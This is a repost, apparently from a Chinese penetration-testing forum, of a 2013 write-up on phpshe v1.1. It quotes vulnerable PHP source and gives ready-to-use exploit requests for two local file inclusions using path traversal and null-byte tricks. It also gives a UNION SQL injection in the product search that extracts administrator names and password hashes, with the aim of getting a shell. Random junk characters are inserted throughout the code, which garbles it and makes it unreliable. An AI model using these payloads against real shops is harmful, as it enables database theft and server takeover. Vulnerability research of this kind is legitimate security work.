中国网络渗透测试联盟

标题: phpshe v1.1多处SQL注入和文件包含漏洞Getshell [打印本页]
作者: admin    时间: 2013-4-16 16:45
标题: phpshe v1.1多处SQL注入和文件包含漏洞Getshell
/*******************************************************/% Y; V, \9 X4 L+ \1 p2 \2 i! J# ?
/* Phpshe v1.1 Vulnerability
1 C8 t( d  H" _; \/* ========================# {/ f, n: f/ J; E8 r% t. ^* |! l
/* By: : Kn1f36 s# }; F6 h: X0 Z0 b
/* E-Mail : 681796@qq.com
* M6 ~9 ?2 N( S/*******************************************************/
) X4 H$ l& P" }1 u. f  ^- Z0×00 整体大概参数传输: I7 S  B" ~0 Z* c& ^$ _
0 B5 \. k' t5 @% I2 f- N- y

; a) d0 n! d3 q1 W: u7 ]! Q1 m3 @9 U; b* j: g# @
//common.php( `# }# h' w1 f8 ?8 N. G5 d( l% d
if (get_magic_quotes_gpc()) {( A2 W5 ]7 s: u* Z
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');: O9 u# P& G/ Y; m3 i
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
! V8 z9 k; x9 B- Y7 }7 o}. G9 B1 r: p; B
else {. j2 M, v# T+ ~
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');; y4 w( S: C/ i, h' s
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
: X8 C% E3 a. {* K% S}
( ]$ |4 t, g. ]$ n. U3 {$ zsession_start();
6 d/ K" \- z2 m. ?8 S!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
0 X5 P* x. t# m7 G+ B% @6 M- s!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
) {9 C: f% i6 O" }) e8 k- N) L6 q& U7 z# X" {. f4 e; U! X6 |$ M
0×01 包含漏洞1 g) U# T1 z7 ]8 l7 w/ `

2 c  `% z: z/ c( K; ?% |* R
" f: U' ]% p2 c6 w0 a( ^0 G& j) z//首页文件) v3 y- T+ P( T8 I; h0 O) c; I/ X' Q
<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);6 H+ \5 K" K' Q. P* N6 U
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
( J" d, Q! m7 Ope_result();
/ ]; ]/ H- u# o- z7 ??>
; k8 ]2 x6 O) P4 a% D8 F//common 文件 第15行开始, B1 f& O1 J, O- n7 f! c& b1 ~
url路由配置  ]7 s/ M& T3 l# T( f, z( Z1 ?* `6 O4 Y
$module = $mod = $act = 'index';
- r) w/ U1 ~# \+ \+ R$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);; x5 ]& ?* V% ^$ \; X9 F* }% J
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
! B5 a9 w6 E  T3 L6 r. R1 g$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
7 _& X4 u& c# N- B1 P//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00- X7 a' e7 B7 |6 Z0 h% S2 v

, p% W* z/ |! L" K

, z" }* {: ?' Y* ~5 t' u 0×02 搜索注入& h3 Z" M# v; f( @
% W( L5 ~8 z0 i9 W3 m5 [
<code id="code2">

//product.php文件
/ t) y' K# A4 p2 }3 Qcase 'list':# l5 o) k  }+ i9 D
$category_id = intval($id);$ ]! T8 h4 ~- K5 C6 d3 a, r" m- x
$info = $db->pe_select('category', array('category_id'=>$category_id));5 v- {; q9 i/ [1 U5 J
//搜索) R4 q6 X0 v! _* R. g" O+ G+ y
$sqlwhere = " and `product_state` = 1";# i8 _" O7 t6 J* z- N3 f# y
pe_lead('hook/category.hook.php');* `6 G5 l+ d: p5 |' r2 X
if ($category_id) {: Z8 A) ]# W5 |$ A& _/ G
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";7 H" ]$ p' u+ `1 f5 {# `4 U0 i  Z
}6 c6 {- B7 H% q% w+ @
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤, u# E# A! O! J) M+ o% T) D4 ~
if ($_g_orderby) {5 h% Q4 y8 z. c9 R2 v
$orderby = explode('_', $_g_orderby);4 a  F' m6 `! Q3 x/ ?
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
0 h& i5 j% X; y}6 n) b# k% I  O8 L  l& ]3 \" C
else {
/ ]* W& @- p) j$ ~0 d3 `$sqlwhere .= " order by `product_id` desc";; }+ q5 c2 T' K  f. d# R
}. c6 K' w# }3 K& G
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
1 J9 k+ t8 V+ I& j3 w, q6 S//热卖排行  [% e3 [! Q8 @4 i/ f9 U
$product_hotlist = product_hotlist();; J% h! {% r5 t( P1 l! |! k6 P
//当前路径8 M: ^4 U$ O; {1 ^4 A& H4 h  K  @
$nowpath = category_path($category_id);
2 ]. M0 K. I  }$ ~/ [. S$seo = pe_seo($info['category_name']);1 h1 F$ x; T* U
include(pe_tpl('product_list.html'));
6 q$ O5 d3 [" v//跟进selectall函数库
& {. G* f3 U2 gpublic function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
0 m2 `- m5 ~; E' J: `$ p; c{
1 h5 R7 S3 g. a5 [//处理条件语句
7 G4 L% J, G$ g1 n0 j7 Z7 ?$ J/ L$sqlwhere = $this->_dowhere($where);3 Q" g4 _, [* t  J3 w) r
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
+ N! s8 v: C$ I1 x0 B! I! A}. f# J& |! G! F7 v+ L/ ^$ M
//exp: i; t9 x  c( U9 {) o
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
# n. P& v0 D9 H3 V7 S; g) f

</code>1 D. t( J& Q' a4 y3 O5 J

: i; \5 W) {5 k/ ]" p  X0×03 包含漏洞28 i( z3 Y% @6 y

$ P4 \9 |3 I% @; R' u$ ?% F4 h1 t<code id="code3">

//order.php

case 'pay':

$ G- v! C' \4 u* b! G0 w
$order_id = pe_dbhold($_g_id);


" s+ Z& X8 J& N7 {! M! C. ~, T$cache_payway = cache::get('payway');


. J# F; ]8 ~; i! ]  B: C$ y/ N" Eforeach($cache_payway as $k => $v) {

; T7 n% U$ l8 ^: Y2 J
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

" m! C! K) N: R
if ($k == 'bank') {

. C- G# B- l/ {) l3 v2 T' f3 J: n6 Y
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

* @5 p6 Q5 z: v& O) ?, q: i4 s% Y# ^
}


( u1 e* J" \2 E3 j- Z7 M/ b}

& _& |  x# A% G" F6 a/ }8 L
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

( H' Z4 f* f7 z5 y3 C
!$order['order_id'] && pe_error('订单号错误...');

7 P/ ?% D9 i( z
if (isset($_p_pesubmit)) {

: y4 b; a3 N# U* x( e
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {


2 U& k% I; v9 w% U5 y% u7 \$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));


7 t5 n/ {+ k) k2 F0 {0 oforeach ($info_list as $v) {

' E  i5 x  {7 Q0 g* [
$order['order_name'] .= "{$v['product_name']};";
& q3 i) W! u; k0 R0 M


$ J# m# [# s3 j5 p4 G}


- p! p7 u) j4 Z, ^3 b$ kecho '正在为您连接支付网站,请稍后...';

& T& S5 d/ g1 |1 Y# t. q
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


9 m' T& A4 e. Q: [2 ]! @0 f}//当一切准备好的时候就可以进行"鸡肋包含了"


4 p# ~6 X4 L, L! c) ]2 H; uelse {

; M. k, \) i) G4 c' V; `! \  b# N
pe_error('支付错误...');

2 t4 O6 {5 S" w4 E5 H) H
}

8 N+ [0 t4 W8 P
}


7 {; [$ @/ ]% o1 g6 }' U$seo = pe_seo('选择支付方式');

; G6 S# N+ [" U  ], _# H: |
include(pe_tpl('order_pay.html'));


9 I/ x  w7 a/ @' `) ebreak;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>$ H5 Y( Z, x8 b& C5 @) L
http://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2